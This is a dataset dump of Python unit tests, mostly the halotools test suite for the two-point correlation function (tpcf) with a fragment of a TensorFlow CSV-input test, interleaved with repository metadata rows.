feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
@RunAsSubprocess
def test_csv_input_ex(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field[1-3]'
input_type: STRING
}
label_fields: 'label'
batch_size: 1024
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInputEx(dataset_config, feature_configs,
self._input_path_with_quote).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
@RunAsSubprocess
def test_csv_data_ignore_error(self):
data_config_str = """
input_fields {
input_name: 'label'
input_type: FLOAT
}
input_fields {
input_name: 'field[1-3]'
input_type: STRING
}
label_fields: 'label'
batch_size: 32
num_epochs: 10000
prefetch_size: 32
auto_expand_input_fields: true
ignore_error: true
"""
feature_config_str = """
input_names: 'field1'
shared_names: 'field[2-3]'
feature_type: IdFeature
embedding_dim: 32
hash_bucket_size: 2000
"""
dataset_config = DatasetConfig()
text_format.Merge(data_config_str, dataset_config)
feature_config = FeatureConfig()
text_format.Merge(feature_config_str, feature_config)
feature_configs = [feature_config]
empty_config = FeatureConfig()
empty_config.CopyFrom(feature_config)
while len(empty_config.input_names) > 0:
empty_config.input_names.pop()
while len(empty_config.shared_names) > 0:
empty_config.shared_names.pop()
for input_name in feature_config.shared_names:
input_names = config_util.auto_expand_names(input_name)
for tmp_name in input_names:
tmp_config = FeatureConfig()
tmp_config.CopyFrom(empty_config)
tmp_config.input_names.append(tmp_name)
feature_configs.append(tmp_config)
train_input_fn = CSVInput(dataset_config, feature_configs,
self._input_path_with_quote).create_input()
dataset = train_input_fn(mode=tf.estimator.ModeKeys.TRAIN)
iterator = dataset.make_initializable_iterator()
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
features, labels = iterator.get_next()
init_op = tf.get_collection(tf.GraphKeys.TABLE_INITIALIZERS)
gpu_options = tf.GPUOptions(allow_growth=True)
session_config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
with self.test_session(config=session_config) as sess:
sess.run(init_op)
feature_dict, label_dict = sess.run([features, labels])
if __name__ == '__main__':
tf.test.main()
| 35.018237
| 105
| 0.700026
| 1,438
| 11,521
| 5.235744
| 0.112656
| 0.06216
| 0.031877
| 0.031877
| 0.899987
| 0.881259
| 0.881259
| 0.87329
| 0.867313
| 0.861071
| 0
| 0.014381
| 0.215346
| 11,521
| 328
| 106
| 35.125
| 0.818473
| 0.01111
| 0
| 0.85342
| 0
| 0
| 0.234519
| 0.013527
| 0
| 0
| 0
| 0
| 0.003257
| 1
| 0.019544
| false
| 0.009772
| 0.029316
| 0
| 0.052117
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57b24aba25dd0d2d6139acf8687233cee556ccd7
| 21,944
|
py
|
Python
|
halotools/mock_observables/two_point_clustering/tests/test_tpcf.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 83
|
2015-01-15T14:54:16.000Z
|
2021-12-09T11:28:02.000Z
|
halotools/mock_observables/two_point_clustering/tests/test_tpcf.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 579
|
2015-01-14T15:57:37.000Z
|
2022-01-13T18:58:44.000Z
|
halotools/mock_observables/two_point_clustering/tests/test_tpcf.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 70
|
2015-01-14T15:15:58.000Z
|
2021-12-22T18:18:31.000Z
|
""" Module providing unit-testing for the `~halotools.mock_observables.tpcf` function.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import warnings
import pytest
from astropy.utils.misc import NumpyRNGContext
from .locate_external_unit_testing_data import tpcf_corrfunc_comparison_files_exist
from ..tpcf import tpcf
from ....custom_exceptions import HalotoolsError
slow = pytest.mark.slow
__all__ = ('test_tpcf_auto', 'test_tpcf_cross', 'test_tpcf_estimators',
'test_tpcf_sample_size_limit', 'test_tpcf_randoms',
'test_tpcf_period_API', 'test_tpcf_cross_consistency_w_auto')
fixed_seed = 43
TPCF_CORRFUNC_FILES_EXIST = tpcf_corrfunc_comparison_files_exist()
@slow
def test_tpcf_auto():
"""
test the tpcf auto-correlation functionality
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# with randoms
result = tpcf(sample1, rbins, sample2=None,
randoms=randoms, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
assert result.ndim == 1, "More than one correlation function returned erroneously."
# with out randoms
result = tpcf(sample1, rbins, sample2=None,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax], num_threads=1)
assert result.ndim == 1, "More than one correlation function returned erroneously."
@slow
def test_tpcf_cross():
"""
test the tpcf cross-correlation functionality
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# with randoms
result = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Natural', do_auto=False,
approx_cell1_size=[rmax, rmax, rmax])
assert result.ndim == 1, "More than one correlation function returned erroneously."
# with out randoms
result = tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=period,
estimator='Natural', do_auto=False,
approx_cell1_size=[rmax, rmax, rmax])
assert result.ndim == 1, "More than one correlation function returned erroneously."
@slow
def test_tpcf_estimators():
"""
test the tpcf different estimators functionality
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
result_1 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_2 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Davis-Peebles',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_3 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Hewett',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_4 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Hamilton',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
result_5 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Landy-Szalay',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
assert len(result_1) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_2) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_3) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_4) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_5) == 3, "wrong number of correlation functions returned erroneously."
@slow
def test_tpcf_randoms():
"""
test the tpcf possible randoms + PBCs combinations
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((100, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# No PBCs w/ randoms
result_1 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
# PBCs w/o randoms
result_2 = tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
# PBCs w/ randoms
result_3 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
# No PBCs and no randoms should throw an error.
with pytest.raises(ValueError) as err:
tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=None,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
approx_cellran_size=[rmax, rmax, rmax])
substr = "If no PBCs are specified, randoms must be provided."
assert substr in err.value.args[0]
assert len(result_1) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_2) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_3) == 3, "wrong number of correlation functions returned erroneously."
@slow
def test_tpcf_period_API():
"""
test the tpcf period API functionality.
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
result_1 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
period = 1.0
result_2 = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
# should throw an error. period must be positive!
period = np.array([1.0, 1.0, -1.0])
with pytest.raises(ValueError) as err:
tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
substr = "All values must bounded positive numbers."
assert substr in err.value.args[0]
assert len(result_1) == 3, "wrong number of correlation functions returned erroneously."
assert len(result_2) == 3, "wrong number of correlation functions returned erroneously."
@slow
def test_tpcf_cross_consistency_w_auto():
"""
test the tpcf cross-correlation mode consistency with auto-correlation mode
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((200, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((300, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
# with out randoms
result1 = tpcf(sample1, rbins, sample2=None,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result2 = tpcf(sample2, rbins, sample2=None,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result1_p, result12, result2_p = tpcf(sample1, rbins, sample2=sample2,
randoms=None, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
assert np.allclose(result1, result1_p), "cross mode and auto mode are not the same"
assert np.allclose(result2, result2_p), "cross mode and auto mode are not the same"
# with randoms
result1 = tpcf(sample1, rbins, sample2=None,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result2 = tpcf(sample2, rbins, sample2=None,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
result1_p, result12, result2_p = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax])
assert np.allclose(result1, result1_p), "cross mode and auto mode are not the same"
assert np.allclose(result2, result2_p), "cross mode and auto mode are not the same"
def test_RR_precomputed_exception_handling1():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
RR_precomputed = rmax
with pytest.raises(HalotoolsError) as err:
_ = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
RR_precomputed=RR_precomputed)
substr = "``RR_precomputed`` and ``NR_precomputed`` arguments, or neither\n"
assert substr in err.value.args[0]
def test_RR_precomputed_exception_handling2():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
RR_precomputed = rbins[:-2]
NR_precomputed = randoms.shape[0]
with pytest.raises(HalotoolsError) as err:
_ = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
RR_precomputed=RR_precomputed, NR_precomputed=NR_precomputed)
substr = "\nLength of ``RR_precomputed`` must match length of ``rbins``\n"
assert substr in err.value.args[0]
def test_RR_precomputed_exception_handling3():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((100, 3))
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
RR_precomputed = rbins[:-1]
NR_precomputed = 5
with pytest.raises(HalotoolsError) as err:
_ = tpcf(sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=[rmax, rmax, rmax],
RR_precomputed=RR_precomputed, NR_precomputed=NR_precomputed)
substr = "the value of NR_precomputed must agree with the number of randoms"
assert substr in err.value.args[0]
@slow
def test_RR_precomputed_natural_estimator_auto():
""" Strategy here is as follows. First, we adopt the same setup
with randomly generated points as used in the rest of the test suite.
First, we just compute the tpcf in the normal way.
Then we break apart the tpcf innards so that we can
compute RR in the exact same way that it is computed within tpcf.
We will then pass in this RR using the RR_precomputed keyword,
and verify that the tpcf computed in this second way gives
exactly the same results as if we did not pre-compute RR.
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = sample1
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
approx_cell1_size = [rmax, rmax, rmax]
approx_cell2_size = approx_cell1_size
approx_cellran_size = [rmax, rmax, rmax]
normal_result = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size)
# The following quantities are computed inside the
# tpcf namespace. We reproduce them here because they are
# necessary inputs to the _random_counts and _pair_counts
# functions called by tpcf
_sample1_is_sample2 = True
PBCs = True
num_threads = 1
do_DD, do_DR, do_RR = True, True, True
do_auto, do_cross = True, False
from ..tpcf import _random_counts, _pair_counts
# count data pairs
D1D1, D1D2, D2D2 = _pair_counts(
sample1, sample2, rbins, period,
num_threads, do_auto, do_cross, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size)
# count random pairs
D1R, D2R, RR = _random_counts(
sample1, sample2, randoms, rbins, period,
PBCs, num_threads, do_RR, do_DR, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size, approx_cellran_size)
N1 = len(sample1)
NR = len(randoms)
factor = N1*N1/(NR*NR)
def mult(x, y):
return x*y
xi_11 = mult(1.0/factor, D1D1/RR) - 1.0
# The following assertion implies that the RR
# computed within this testing namespace is the same RR
# as computed in the tpcf namespace
assert np.all(xi_11 == normal_result)
# Now we will pass in the above RR as an argument
# and verify that we get an identical tpcf
result_with_RR_precomputed = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Natural',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size,
RR_precomputed=RR,
NR_precomputed=NR)
assert np.all(result_with_RR_precomputed == normal_result)
@slow
def test_RR_precomputed_Landy_Szalay_estimator_auto():
""" Strategy here is as follows. First, we adopt the same setup
with randomly generated points as used in the rest of the test suite.
First, we just compute the tpcf in the normal way.
Then we break apart the tpcf innards so that we can
compute RR in the exact same way that it is computed within tpcf.
We will then pass in this RR using the RR_precomputed keyword,
and verify that the tpcf computed in this second way gives
exactly the same results as if we did not pre-compute RR.
"""
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = sample1
randoms = np.random.random((100, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.001, 0.3, 5)
rmax = rbins.max()
approx_cell1_size = [rmax, rmax, rmax]
approx_cell2_size = approx_cell1_size
approx_cellran_size = [rmax, rmax, rmax]
normal_result = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Landy-Szalay',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size)
# The following quantities are computed inside the
# tpcf namespace. We reproduce them here because they are
# necessary inputs to the _random_counts and _pair_counts
# functions called by tpcf
_sample1_is_sample2 = True
PBCs = True
num_threads = 1
do_DD, do_DR, do_RR = True, True, True
do_auto, do_cross = True, False
from ..tpcf import _random_counts, _pair_counts
# count data pairs
D1D1, D1D2, D2D2 = _pair_counts(
sample1, sample2, rbins, period,
num_threads, do_auto, do_cross, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size)
# count random pairs
D1R, D2R, RR = _random_counts(
sample1, sample2, randoms, rbins, period,
PBCs, num_threads, do_RR, do_DR, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size, approx_cellran_size)
ND1 = len(sample1)
ND2 = len(sample2)
NR1 = len(randoms)
NR2 = len(randoms)
factor1 = ND1*ND2/(NR1*NR2)
factor2 = ND1*NR2/(NR1*NR2)
def mult(x, y):
return x*y
xi_11 = mult(1.0/factor1, D1D1/RR) - mult(1.0/factor2, 2.0*D1R/RR) + 1.0
# # The following assertion implies that the RR
# # computed within this testing namespace is the same RR
# # as computed in the tpcf namespace
assert np.all(xi_11 == normal_result)
# Now we will pass in the above RR as an argument
# and verify that we get an identical tpcf
result_with_RR_precomputed = tpcf(
sample1, rbins, sample2=sample2,
randoms=randoms, period=period,
estimator='Landy-Szalay',
approx_cell1_size=approx_cell1_size,
approx_cellran_size=approx_cellran_size,
RR_precomputed=RR,
NR_precomputed=NR1)
assert np.all(result_with_RR_precomputed == normal_result)
def test_tpcf_raises_exception_for_non_monotonic_rbins():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(10, 0.3, 5)
with pytest.raises(TypeError) as err:
normal_result = tpcf(sample1, rbins, period=period)
substr = "Input separation bins must be a monotonically increasing"
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_large_search_length():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.5, 5)
with pytest.raises(ValueError) as err:
normal_result = tpcf(sample1, rbins, period=period)
substr = "Either decrease your search length or use a larger simulation"
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_incompatible_data_shapes():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((1000, 2))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.3, 5)
with pytest.raises(TypeError) as err:
normal_result = tpcf(sample1, rbins, sample2=sample2, period=period)
substr = "Input sample of points must be a Numpy ndarray of shape (Npts, 3)."
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_bad_do_auto_instructions():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.3, 5)
with pytest.raises(ValueError) as err:
normal_result = tpcf(sample1, rbins, sample2=sample2, period=period,
do_auto='Jose Canseco')
substr = "`do_auto` and `do_cross` keywords must be boolean-valued."
assert substr in err.value.args[0]
def test_tpcf_raises_exception_for_unavailable_estimator():
with NumpyRNGContext(fixed_seed):
sample1 = np.random.random((1000, 3))
sample2 = np.random.random((1000, 3))
period = np.array([1.0, 1.0, 1.0])
rbins = np.linspace(0.1, 0.3, 5)
with pytest.raises(ValueError) as err:
normal_result = tpcf(sample1, rbins, period=period,
estimator='Jose Canseco')
substr = "is not in the list of available estimators:"
assert substr in err.value.args[0]
@pytest.mark.skipif('not TPCF_CORRFUNC_FILES_EXIST')
def test_tpcf_vs_corrfunc():
"""
"""
msg = ("This unit-test compares the tpcf results from halotools \n"
"against the results derived from the Corrfunc code managed by \n"
"Manodeep Sinha. ")
__, aph_fname1, aph_fname2, aph_fname3, deep_fname1, deep_fname2 = (
tpcf_corrfunc_comparison_files_exist(return_fnames=True))
sinha_sample1_xi = np.load(deep_fname1)[:, 0]
sinha_sample2_xi = np.load(deep_fname2)[:, 0]
sample1 = np.load(aph_fname1)
sample2 = np.load(aph_fname2)
rbins = np.load(aph_fname3)
halotools_result1 = tpcf(sample1, rbins, period=250.0)
assert np.allclose(halotools_result1, sinha_sample1_xi, rtol=1e-5), msg
halotools_result2 = tpcf(sample2, rbins, period=250.0)
assert np.allclose(halotools_result2, sinha_sample2_xi, rtol=1e-5), msg
| 37.704467
| 92
| 0.641497
| 2,873
| 21,944
| 4.737208
| 0.104769
| 0.045849
| 0.045187
| 0.045849
| 0.843718
| 0.822998
| 0.816752
| 0.81205
| 0.798604
| 0.789493
| 0
| 0.044816
| 0.256699
| 21,944
| 581
| 93
| 37.769363
| 0.78959
| 0.112969
| 0
| 0.764706
| 0
| 0
| 0.109529
| 0.004468
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.046569
| false
| 0
| 0.02451
| 0.004902
| 0.07598
| 0.002451
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17caa1453c4a2473d5c321f75d4d6a5f0c0d296e
| 132
|
py
|
Python
|
catflap/proxies/__init__.py
|
yay4ya/catflap
|
1cb146417948c4c60c4765287c6f62664058290b
|
[
"MIT"
] | null | null | null |
catflap/proxies/__init__.py
|
yay4ya/catflap
|
1cb146417948c4c60c4765287c6f62664058290b
|
[
"MIT"
] | null | null | null |
catflap/proxies/__init__.py
|
yay4ya/catflap
|
1cb146417948c4c60c4765287c6f62664058290b
|
[
"MIT"
] | 1
|
2020-06-30T15:56:07.000Z
|
2020-06-30T15:56:07.000Z
|
from catflap.proxies.proxy import Proxy
from catflap.proxies.slack import SlackProxy
from catflap.proxies.stdout import StdoutProxy
| 33
| 46
| 0.863636
| 18
| 132
| 6.333333
| 0.5
| 0.289474
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 132
| 3
| 47
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa04b571ee6f3062030c2dd29e2e926c19a39069
| 105
|
py
|
Python
|
exercises/data_structures/__init__.py
|
maxwellmattryan/cs-313e
|
462a871475ba956e364a0faf98284633462984b8
|
[
"MIT"
] | 1
|
2020-02-05T23:56:16.000Z
|
2020-02-05T23:56:16.000Z
|
exercises/data_structures/__init__.py
|
maxwellmattryan/cs-313e
|
462a871475ba956e364a0faf98284633462984b8
|
[
"MIT"
] | null | null | null |
exercises/data_structures/__init__.py
|
maxwellmattryan/cs-313e
|
462a871475ba956e364a0faf98284633462984b8
|
[
"MIT"
] | 2
|
2020-03-09T16:26:00.000Z
|
2021-07-23T03:17:11.000Z
|
import data_structures.binary_search_tree
import data_structures.linked_list
import data_structures.stack
| 35
| 41
| 0.92381
| 15
| 105
| 6.066667
| 0.6
| 0.32967
| 0.659341
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 105
| 3
| 42
| 35
| 0.91
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa0fb79a38d2cf1ad20735658dbd222d14c0338b
| 181
|
py
|
Python
|
plugins/haveibeenpwned/icon_haveibeenpwned/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/haveibeenpwned/icon_haveibeenpwned/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/haveibeenpwned/icon_haveibeenpwned/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .lookup_domain.action import LookupDomain
from .lookup_password.action import LookupPassword
from .lookup_user.action import LookupUser
| 36.2
| 50
| 0.839779
| 25
| 181
| 5.96
| 0.68
| 0.201342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116022
| 181
| 4
| 51
| 45.25
| 0.93125
| 0.20442
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
a4b8170eac942a873d8ddd749362614583413aed
| 11,751
|
py
|
Python
|
scripts/main_msd_vae.py
|
RACT-CF/RaCT
|
ced06c9e3398184c82aa42d5eb0cd5679c905375
|
[
"Apache-2.0"
] | 36
|
2019-06-12T16:35:24.000Z
|
2022-02-18T02:17:03.000Z
|
scripts/main_msd_vae.py
|
RACT-CF/RaCT
|
ced06c9e3398184c82aa42d5eb0cd5679c905375
|
[
"Apache-2.0"
] | 1
|
2019-08-07T06:49:33.000Z
|
2020-06-20T19:04:50.000Z
|
scripts/main_msd_vae.py
|
RACT-CF/RaCT
|
ced06c9e3398184c82aa42d5eb0cd5679c905375
|
[
"Apache-2.0"
] | 6
|
2019-11-19T05:33:59.000Z
|
